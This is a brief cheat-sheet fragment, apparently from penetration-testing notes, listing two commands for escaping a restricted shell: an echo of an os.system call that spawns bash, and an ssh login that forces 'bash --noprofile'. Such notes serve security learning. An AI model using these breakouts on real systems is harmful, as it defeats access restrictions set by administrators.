Last updated 1 year ago
Resources:
Escape a restricted shell with echo command:
echo os.system('/bin/bash')
ssh <username>@<ip> -t "bash --noprofile"